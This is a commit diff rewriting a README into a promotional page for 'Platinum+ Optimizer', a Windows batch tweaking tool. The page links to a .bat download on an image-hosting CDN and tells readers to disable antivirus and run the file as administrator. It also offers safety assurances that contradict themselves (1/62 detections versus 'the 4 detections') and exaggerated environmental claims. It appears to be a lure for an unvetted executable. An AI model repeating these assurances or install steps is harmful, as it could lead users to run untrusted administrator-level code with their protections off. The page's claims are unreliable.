|
1 | | -# Platinum-Optimizer |
| 1 | +<div align="center"> |
| 2 | +<h2 style="color: #333; font-family: Arial, sans-serif; margin-bottom: 10px;"> |
| 3 | + Platinum+ Optimizer 8.5 Beta V3 is now released🔥❗<br> |
| 4 | + <a href="https://ik.imagekit.io/clcrylnuj/Platinum+Optimizer.8.5.Beta.V3.bat" target="_blank" style="color: #007bff; text-decoration: none;"> |
| 5 | + Download now here📥 |
| 6 | + </a> |
| 7 | +</h2> |
| 8 | + <img src="https://i.ibb.co/GfYV2Rtv/platinum.png" alt="Platinum+ Optimizer Interface" width="700"> |
| 9 | + <p><em></em></p> |
| 10 | +</div> |
| 11 | + |
| 12 | +## 1. ❓ WHAT IS PLATINUM+ OPTIMIZER? |
| 13 | + |
| 14 | +**Platinum+ Optimizer** is an advanced optimization software for Windows operating systems, developed by [Stefano](https://t.me/STEFANO83223) and **Aledect**. The program is delivered as a native batch script that operates at a deep system level, intervening in the registry, services, processes, kernel, and hardware parameters. |
| 15 | + |
| 16 | +The primary goal of the tool is to **maximize performance**, **reduce latency**, **eliminate superfluous components**, and **improve energy efficiency**, while ensuring stability and reliability. |
| 17 | + |
| 18 | +The software is designed to be compatible with all modern versions of Windows 10 and Windows 11. Thanks to a **dynamic detection system**, Platinum+ Optimizer adapts optimizations based on the detected hardware (CPU Intel/AMD, GPU NVIDIA/AMD/Intel), ensuring targeted and conflict-free interventions. The tool can revive obsolete systems, making them usable again, and push modern hardware to its full potential. |
| 19 | + |
| 20 | +--- |
| 21 | + |
| 22 | +## 2. ⚙️ FUNCTIONAL ANALYSIS |
| 23 | + |
| 24 | +Platinum+ Optimizer performs operations divided into critical intervention areas: |
| 25 | + |
| 26 | +### 2.1 Process and Service Management |
| 27 | +The software terminates non-essential processes that consume background resources. |
| 28 | +* **Process Termination:** Stops processes related to telemetry, non-critical updates, and overlays (e.g., `GameBarPresenceWriter`, `DiagTrack`, `CompatTelRunner`). |
| 29 | +* **Service Disabling:** Disables heavy services such as `SysMain`, `WSearch`, `FontCache`, and various telemetry services via `sc config` and registry. |
| 30 | +* **Execution Blocking:** Applies rules via `Image File Execution Options` to prevent unwanted components from starting. |
| 31 | + |
| 32 | +### 2.2 Registry Optimization |
| 33 | +Modification of over two hundred registry keys to optimize system behavior. |
| 34 | +* **Kernel and Scheduler:** Tweaks to reduce DPC latencies, optimize interrupt handling, and improve system responsiveness. Configuration of parameters like `DpcWatchdogProfile`, `DpcTimeout`, and `HeapDeCommitFreeBlockThreshold`. |
| 35 | +* **Memory Management:** Optimization of virtual memory and file system cache. |
| 36 | +* **FileSystem:** Modification of `NtfsDisable8dot3NameCreation` and `LongPathsEnabled` to improve I/O operations. |
| 37 | + |
| 38 | +### 2.3 GPU and Gaming Optimization |
| 39 | +Specific graphic optimizations by automatically detecting the installed video card. |
| 40 | +* **NVIDIA:** Application of tweaks via registry and `nvidia-smi` to optimize power management (`PowerMizerLevel`), improve shader cache, and reduce input lag. Advanced driver parameter configuration to maximize performance. |
| 41 | +* **AMD:** Configuration of UMD parameters to optimize tessellation and resource management. |
| 42 | +* **Intel:** Optimization of integrated graphics services. |
| 43 | +* **DirectX and DWM:** Enabling `FlipModel`, `ForceIndependentFlip`, and asynchronous presentation optimization to reduce lag. |
| 44 | + |
| 45 | +### 2.4 Power Management |
| 46 | +Reconfiguration of Windows power schemes to eliminate aggressive throttling. |
| 47 | +* **Advanced PowerCfg:** Modification of hidden parameters (`-ATTRIB_HIDE`) for CPU management, including C-states and response latencies. |
| 48 | +* **PCI Express:** Disabling power saving on PCIe links to ensure constant bandwidth. |
| 49 | +* **Thermal Management:** Optimization of thermal policies to balance performance and temperatures. |
| 50 | + |
| 51 | +### 2.5 Network and Connectivity |
| 52 | +Optimizations to the TCP/IP stack for stability and latency. |
| 53 | +* **TCP/IP Tuning:** Modification of `MaxUserPort`, `TcpTimedWaitDelay`, and `GlobalMaxTcpWindowSize`. |
| 54 | +* **Legacy Component Removal:** Disabling non-essential features like `TelnetClient`, `SNMP`, and `SmbDirect`. |
| 55 | +* **Network Privacy:** Blocking network telemetry. |
| 56 | + |
| 57 | +### 2.6 Privacy and Telemetry |
| 58 | +Measures to protect user privacy. |
| 59 | +* **Telemetry Disabling:** Blocking services and scheduled tasks (`DiagTrack`, `CEIP`, `Consolidator`). |
| 60 | +* **Browser Policies:** Policies for Edge, Chrome, and Firefox to disable tracking and reporting. |
| 61 | +* **Data Cleaning:** Removal of logs and temporary caches. |
| 62 | + |
| 63 | +### 2.7 Cleaning and Maintenance |
| 64 | +* **Temporary Files:** Deletion of files in `%Temp%`, Windows Update cache, and application residuals. |
| 65 | +* **Windows Components:** Removal of unused optional capabilities. |
| 66 | + |
| 67 | +--- |
| 68 | + |
| 69 | +## 3. 🛠️ TECHNICAL IMPLEMENTATION DETAILS |
| 70 | + |
| 71 | +### 3.1 Hardware and Version Detection |
| 72 | +PowerShell and batch routines for dynamic environment detection: |
| 73 | +* **Windows Version:** Build verification to apply only compatible modifications. |
| 74 | +* **CPU/GPU:** Manufacturer detection to apply specific tweaks. |
| 75 | + |
| 76 | +### 3.2 Permission Management and Safety |
| 77 | +* **Take Ownership:** Acquiring ownership of protected files and keys via `takeown` and `icacls`. |
| 78 | +* **Backup:** Automatic creation of registry backups before critical modifications. |
| 79 | +* **Transparency:** The script is fully readable and does not use obfuscation techniques. |
| 80 | + |
| 81 | +### 3.3 Script Structure |
| 82 | +Code organized into logical sections with error handling and preliminary checks. Combined use of native batch and inline PowerShell for maximum compatibility. |
| 83 | + |
| 84 | +--- |
| 85 | + |
| 86 | +## 4. 🔍 VIRUSTOTAL ANALYSIS & FALSE POSITIVES |
| 87 | + |
| 88 | +Platinum+ Optimizer is a **safe, transparent, and fully readable script**. However, due to its deep system optimization nature, some antivirus engines may flag it with **False Positives** based on heuristic analysis. |
| 89 | + |
| 90 | +### Scan Results |
| 91 | +* **VirusTotal Report:** [View Full Scan](https://www.virustotal.com/gui/file/fde866f634bb91d4395c244865b6b81b9eb1b56b2b9219edbaebe8cdc457dc45) |
| 92 | +* **Detections:** 1/62 Engines (False Positives) |
| 93 | +* **Verdict:** ✅ **Safe** – Detections are heuristic and related to legitimate optimization actions. |
| 94 | + |
| 95 | +### Explanation of Detections |
| 96 | +The 4 detections reported by minor engines are triggered by the following legitimate behaviors: |
| 97 | + |
| 98 | +| # | Detection Type | Cause | Explanation | |
| 99 | +|---|----------------|-------|-------------| |
| 100 | +| **1** | `BAT.Starter.721` | **Heuristic Script Behavior** | DrWeb flags the file because it is a batch script that launches PowerShell commands and applies administrative system changes. This is a generic heuristic detection for scripts that initiate configuration modifications. The script is **unobfuscated**, fully readable, and contains no malicious payload, network calls, or data exfiltration code. The detection is a **false positive** triggered by the script's legitimate optimization actions. | |
| 101 | + |
| 102 | +> **Safety Assurance:** |
| 103 | +> * The script **does not disable** Windows Defender or antivirus services. |
| 104 | +> * The code is **plain text** and can be audited line-by-line. |
| 105 | +> * All actions are **documented** and reversible via restore points. |
| 106 | +> * Detections are **false positives** common to optimization tools and do not indicate malware. |
| 107 | +
|
| 108 | +--- |
| 109 | + |
| 110 | +## 5. 🌍 ENVIRONMENTAL IMPACT AND SUSTAINABILITY |
| 111 | + |
| 112 | +Platinum+ Optimizer promotes environmental sustainability and economic savings. |
| 113 | + |
| 114 | +### 5.1 Extending Device Lifespan |
| 115 | +Deep optimization and temperature reduction help preserve hardware integrity. It is estimated that using Platinum+ Optimizer can extend the useful life of a computer by up to **7 years**, delaying the need for replacement. |
| 116 | + |
| 117 | +### 5.2 Reducing Electronic Waste (E-Waste) |
| 118 | +By recovering the performance of existing hardware, the software offers a concrete alternative to purchasing new devices. This approach can potentially save **1.6 - 1.7 billion PCs** globally, reducing the environmental impact related to production and disposal. |
| 119 | + |
| 120 | +--- |
| 121 | + |
| 122 | +## 6. 📦 SYSTEM REQUIREMENTS |
| 123 | + |
| 124 | +| Requirement | Specification | |
| 125 | +| :--- | :--- | |
| 126 | +| **Operating System** | Windows 10 / Windows 11 (Recent Builds, x64) | |
| 127 | +| **Privileges** | Administrator Account | |
| 128 | +| **Disk Space** | < 5 MB | |
| 129 | +| **Hardware** | CPU Intel/AMD, GPU NVIDIA/AMD/Intel | |
| 130 | + |
| 131 | +--- |
| 132 | + |
| 133 | +## 7. 🚀 INSTALLATION AND EXECUTION INSTRUCTIONS |
| 134 | + |
| 135 | +1. **Download:** Download `Platinum+Optimizer.8.5V.bat` from the official source. |
| 136 | +2. **Preparation:** Extract to a dedicated folder. Temporarily disable third-party antivirus if necessary. |
| 137 | +3. **Execution:** Right-click > **Run as administrator**. |
| 138 | +4. **Monitoring:** Wait for completion without interrupting. |
| 139 | +5. **Restart:** Reboot the PC to apply configurations. |
| 140 | + |
| 141 | +--- |
| 142 | + |
| 143 | +## 8. 🔄 RESTORE PROCEDURE |
| 144 | + |
| 145 | +> ⚠️ **Recommended Precautions** |
| 146 | +
|
| 147 | +* **Restore Point:** Manually create a system restore point before execution. |
| 148 | +* **Data Backup:** Backup important data. |
| 149 | +* **Restore:** Use the restore point or Windows recovery functions in case of anomalies. |
| 150 | + |
| 151 | +--- |
| 152 | + |
| 153 | +## 9. 📝 DEVELOPMENT NOTES |
| 154 | + |
| 155 | +Project in continuous evolution curated by **Stefano** and **Aledect**. Development based on rigorous testing on real hardware. Regular updates for compatibility and new optimizations. |
| 156 | + |
| 157 | +--- |
| 158 | + |
| 159 | +## 10. COPYRIGHT NOTICE |
| 160 | + |
| 161 | +**Platinum+ Optimizer** is proprietary software. All rights reserved. |
| 162 | + |
| 163 | +* **All Rights Reserved:** Copying, modification, redistribution, or sale without written authorization is strictly prohibited. |
| 164 | +* **Personal Use:** Granted for free only for personal and educational purposes. |
| 165 | +* **Violations:** Pursued according to applicable laws. Removal of unauthorized copies via DMCA. |
| 166 | + |
| 167 | +--- |
| 168 | + |
| 169 | +## 11. DISCLAIMER OF LIABILITY |
| 170 | + |
| 171 | +> **Disclaimer** |
| 172 | +
|
| 173 | +Usage is at the user's sole risk. |
| 174 | + |
| 175 | +Software provided **"as is"**, without warranties. The authors decline all responsibility for damages, data loss, or malfunctions. The user accepts risks and holds the authors harmless. Recommended only for users aware of system restore procedures. |
| 176 | + |
| 177 | +--- |
| 178 | + |
| 179 | +<div align="center"> |
| 180 | + |
| 181 | +**Platinum+ Optimizer** |
| 182 | +Developed by Stefano and Aledect |
| 183 | +All Rights Reserved. © |
| 184 | + |
| 185 | +</div> |
| 186 | + |
0 commit comments